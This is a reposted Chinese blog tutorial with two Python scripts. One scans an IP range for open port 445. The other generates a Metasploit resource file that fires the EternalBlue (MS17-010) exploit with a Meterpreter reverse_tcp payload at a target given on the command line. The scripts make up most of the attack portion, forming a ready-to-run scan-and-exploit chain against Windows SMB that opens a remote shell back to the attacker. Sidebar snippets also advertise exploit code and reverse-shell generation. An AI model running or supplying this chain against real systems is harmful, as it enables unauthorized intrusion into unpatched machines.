python调用metasploit里的MS-17-010模块进行漏洞攻击

最新推荐文章于 2023-08-20 00:00:00 发布
最新推荐文章于 2023-08-20 00:00:00 发布
阅读量410 收藏 2
点赞数
文章标签: python 网络
原文链接:http://www.cnblogs.com/haq5201314/p/8318645.html
版权

起因:看各位大佬们写的shellcode厉害的一匹,可惜自己没学C和汇编

也看不懂shellcode,只能写一个调用metasploit里的模块进行攻击了。

0x01

攻击机:192.168.223.141 kali Linux
目标:192.168.3.5 windows

  需要用到的模块(这里我们写两个脚本,一个用于扫描IP段,看看那个IP开了445)

nmap模块
os模块
sys模块

nmap模块kail自带坑的要死,完全没有相关的函数。
手动卸载:pip uninstall nmap
安装:pip insall nmap

  0x02

代码分析

sm445.py

nmap模块详解:https://pypi.python.org/pypi/python-nmap/0.6.1

import nmap
import sys
print '[+]nmap scanning...'
def portscanner(sbg):
  nmscn=nmap.PortScanner()#实例化nmap.PortScanner对象
  nmscn.scan(sbg,'445')#scan('目标IP','端口')
  for host in nmscn.all_hosts():#获取扫描到的所有主机
      if nmscn[host].has_tcp(445):#判断主机上是否有445端口,
          state=nmscn[host]['tcp'][445]['state']#端口445 / TCP在主机打开
          if state=="open":#如果端口开放
              print '[*]The open 445 ip in:'+host#输出开放端口的IP
portscanner(sys.argv[1])

  

 

yhzl.py

 

import sys
import os
print 'Metasploit executing the ms-17-010 vulnerability attack'#这句话的意思是正在实施MS17010漏洞的攻击
def sds(config):
    config=open('yhzl.rc','w')#首先我们来创建一个xxx.rc的文件
   #把你要使用到的模块和对应的参数写入xxx.rc里去
    config.write('use exploit/windows/smb/ms17_010_eternalblue'+"\n")
    config.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp'+"\n")
    config.write('set RHOST '+sys.argv[1]+"\n")
    config.write('set LHOST '+sys.argv[2]+"\n")
    config.write('exploit'+"\n")
sds('')
def main():
    mg=os.system('msfconsole -r /root/yhzl.rc')#执行msfconsole -r 路径/xxx.rc,就可以了
if __name__ == '__main__':
    main()

  运行截图这里就不放了,我怕电脑蓝屏。视频发到群里了,看攻击过程的小伙伴 

       可以进群看聊天记录。还有欢迎大家进入即刻安全技术交流群:307283889

       推荐大家看基本python的书:

     《python绝技 运用python成为顶级黑客》 python2x 版本

        《python 黑帽子》 python 3x版本

    看完实战,或者构造一个思路去实现他。

转载于:https://www.cnblogs.com/haq5201314/p/8318645.html

weixin_30273175
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
python-sploitkit:用于构建类似Metasploit的控制台的Devkit
05-14
介绍该工具包旨在以类似于Metasploit的样式轻松构建框架控制台。 它提供了一个全面的界面来为其存储数据库定义CLI命令,模块和模型。设置pip install sploitkit用法从这一点来看, main.py具有以下代码: #!/usr/bin...
如何在metasploit中加入第三方脚本(CVE-2019-0708可批量检测)
热门推荐
大哥一声吼
05-24 1万+
msf具有很高的开放性,可以加入第三方脚本毋庸置疑 本文目的:解决自己添加的rb脚本在msf中不能用的问题 【文末附有poc脚本下载地址】rdp rce 首先把下载的脚本放入msf对应的目录之下,之后msfconle下reload_all 放入脚本之后满心欢喜的等待使用,结果返回下面一大堆错我信息,看了上网上的教程并没有找到解决方法 msf > reload_all ...
Python脚本Metasploit交互攻击
谢公子的博客
11-08 5503
Metasploit是一款强大的漏洞扫描和利用工具,编写Python脚本Metasploit进行交互,可以自动化的扫描和利用漏洞。 相关文章:Metasploit框架的使用 在脚本中,我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口,我们写了一个 findTarget() 函数,来扫描给定ip或者给定网段中开放了目标端口的主机,返回开放了445端口的主机列表。445端口是作为...
利用metasploit生成反弹shell程序,实现远程控制
qq_33163046的博客
08-20 3722
Metasploit生成反弹shell实现远程控制的方法具有高度定制化、多平台支持、强大的漏洞利用能力、无需事先安装恶意软件以及高度灵活和可扩展等优点。这使得用户能够根据具体需求和目标系统的特点,实现精确、有效和隐蔽的远程控制。
python调用msf_Python-实现与metasploit交互并进行ms17_010攻击
weixin_39947314的博客
11-30 322
关于ms17_010,可参考http://www.cnblogs.com/sch01ar/p/7672454.html目标IP:192.168.220.139本机IP:192.168.220.145# -*- coding:utf-8 -*-__author__ = "MuT6 Sch01aR"import osdef Handler(configFile,lhost,lport,rhost):c...
Python实现远程调用MetaSploit的方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:...
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
最新发布
12-29
使用metasploit攻击实例讲解1-ms10_046快捷方式图标漏洞
MS17-010:MS17-010 Poc Shell 调用Nmap and Metasploit 内网445测试的一款Poc
05-18
永恒之蓝 MS17-010 Scan and Exploit Shell Usage MAC OSX git clone https://github.com/xaiJoker/MS17-010/ cd ms17-010 && chmod +x ms17-010.sh sh ms17-010.sh Linux git clone ...
MS17-010 python poc
03-23
MS17-010 python poc,MS17-010 python pocMS17-010 python pocMS17-010 python poc
插件分享 | 调用Python脚本进行漏洞测试的PythonCall
m0_46699477的博客
07-29 340
前言: 站在红队的角度,Goby 是一款优秀的渗透测试工具,特点十分鲜明。在漏洞扫描上,一是设备规则集丰富,目前已支持超过 10 万种设备和业务系统,二是部署方便,可部署在任意单机,无需进行复杂的配置。在漏洞录入上,Goby 自研的漏洞扫描框架由 Golang 语言编写,目前的漏洞录入有两种形式,一是通过 JSON 格式录入漏洞发包和判断的逻辑,二是使用 Golang 代码编写发包和判断逻辑。在漏洞开发上,如果能够引入 Python 环境支持运行 Python 脚本,不仅可以提高开发效率,支持更多通信协议.
MSF(metasploit) 添加脚本
YouthBelief的博客
11-05 1956
kali msf脚本存放目录 /usr/share/metasploit-framework/modules/后边根据脚本而定 VPS msf脚本存放目录 /opt/metasploit-framework/embedded/framework/modules/后边根据脚本而定 (1)把准备好的脚本放入对应的目录下 以cve-2021-41773为例 导入下方vps存放地址脚本即可 /opt/metasploit-framework/embedded/framework/modules/exploits
Python脚本进阶】2.4、conficker蠕虫(中):Python脚本Metasploit交互
07-31 553
Python脚本进阶】Python脚本Metasploit交互
python调用metasploit_Python 远程调用MetaSploit
weixin_39846089的博客
12-04 177
(1)安装Python的msgpack类库。MSF官方文档中的数据序列化标准就是參照msgpack。root@kali:~#apt-getinstallpython-setuptoolsroot@kali:~#easy_installmsgpack-python(2)创建createdb_sql.txt:createdatabasemsf;createusermsfwithp...
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4234
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器
weixin_43263566的博客
01-06 6262
Kali最强渗透工具- metasploit
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析
joke_ljh的博客
08-31 4683
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析 漏洞利用及其原理分析 在前面已经讲了利用metaspolit工具利用ms08-067漏洞进行的内网渗透,但是假如你要渗透的对象和你不在同一个局域网,那怎么办?你是不可能攻击到内网的主机,那我们可以想办法让它出来,让它出来主动与我们建立连接。 我们可以利用ms10-002漏洞进行渗透,它是...
网络攻击与防御》ms17-010漏洞(3)
CSDNfengwang的博客
11-08 2620
理解Windows操作系统的安全体系结构与机制,掌握Windows远程安全攻防技术,掌握Windows操作系统网络服务漏洞攻击过程,并学习如何利用metasploit对Windows操作系统进行简单的攻击及提权。利用meterpreter中的Webcan_stream获取Windows 7的摄像头画面(需事先将笔记本摄像头连接至虚拟机Win7上)利用msf框架中的ms17_010_eternalblue脚本攻击Windows 7。└─# msfdb init //初始化。打开metasploit
使用Metasploit实现渗透攻击
2201_76043604的博客
06-24 848
网络渗透攻击是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一, 危害性也非常严重。例如 ,攻击者会有针对性地对某个目标网络进行攻击,以获取其内部的商业资料,进行网络破坏等。因此,攻击者实施攻击的步骤是非常系统的,假设其获取了目标网络中网站服务器的权限,则不会仅满足于控制此台服务器,而是会利用此台服务器, 继续入侵目标网络,获取整个网络中所有主机的权限。二、Metasploit本次实验主要讲解了(1)Metasploit的基础使用和方法基本命令。
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值